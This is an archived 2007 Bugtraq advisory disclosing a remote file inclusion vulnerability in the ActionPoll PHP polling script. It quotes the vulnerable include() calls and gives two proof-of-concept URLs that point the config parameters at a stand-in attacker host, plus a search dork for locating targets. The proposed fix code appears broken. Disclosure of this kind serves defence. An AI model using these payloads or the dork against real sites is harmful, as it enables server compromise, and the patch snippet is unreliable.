bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

ActionPoll Script (actionpoll.php) Remote File Include // starhack.org

from [seko] [Permanent Link][Original]
To: bugtraq@securityfocus.com
Subject: ActionPoll Script (actionpoll.php) Remote File Include // starhack.org
From: seko@se-ko.info
Date: 15 Apr 2007 11:53:26 -0000
Delivered-to: sp-com-lists@consult.net
Delivered-to: bugtraq-list@securepoint.com
Delivered-to: mailing list bugtraq@securityfocus.com
Delivered-to: moderator for bugtraq@securityfocus.com
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@securityfocus.com; run by ezmlm 
--------------------------------------------------
ActionPoll Script  (actionpoll.php) Remote File Include
--------------------------------------------------

Author : SekoMirza
Date Found : April 14 2007
Location : French // ... 
Critical Lvl : critical
Impact : System access
Where : From Remote
--------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~
Application : ActionPoll PhpOpenChat
version : 1.1.0
vendor : http://www.vclcomponents.com/PHP/Polls_and_Voting/Actionpoll-info.html
--------------------------------------------------

Description:
~~~~~~~~

Actionpoll 1.1.2002 - PHP / Polls and Voting
Actionpoll is generated in PHP language which provides facilities to manage 
voting and polling data on portal systems. 

Unlimited options can be...  


--------------------------------------------------

Vulnerability:
~~~~~~~~~~~

vulnerability script in actionpoll.php // DataReaderWriter.php


in actionpoll.php 

include($CONFIG_POLLDB);

--

in db/DataReaderWriter.php 

include($CONFIG_DB);



Proof Of Concept:
~~~~~~~~~~~~
[script path]/actionpoll.php?CONFIG_POLLDB=http://evil_scripts?
[script path]/db/DataReaderWriter.php?CONFIG_DB=http://evil_scripts?

--------------------------------------------------

google d0rk:
~~~~~~~
"Action Poll"

--------------------------------------------------
F!X:
~~~

-open actionpoll.php

-write this code before wrong code 

include ("CONFIG_POLLDB");
if($CONFIG_POLLDB != $xCONFIG_POLLDB) {
exit;
}

-save and exit.

--------------------------------------------------
Shoutz:
~~
~ My Sweet -> Caramel 
~ For Support -> Hypn0sis // Shad0wMan
~ For Support Also  -> www.starhack.org
~ My Bro -> PhantomOrchid

----------------------EOF-------------------------
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
  • ActionPoll Script (actionpoll.php) Remote File Include // starhack.org, seko <=
Previous by Date:  Re: phpMyChat-0.14.5, stuart_smith
Next by Date:  ZoneAlarm Multiple insufficient argument validation of hooked SSDT function Vulnerability, Matousec - Transparent security Research
Previous by Thread:  LS simple guestbook - arbitrary code execution, jd2k2000
Next by Thread:  ZoneAlarm Multiple insufficient argument validation of hooked SSDT function Vulnerability, Matousec - Transparent security Research
Indexes:  [Date] [Thread] [Top] [All Lists]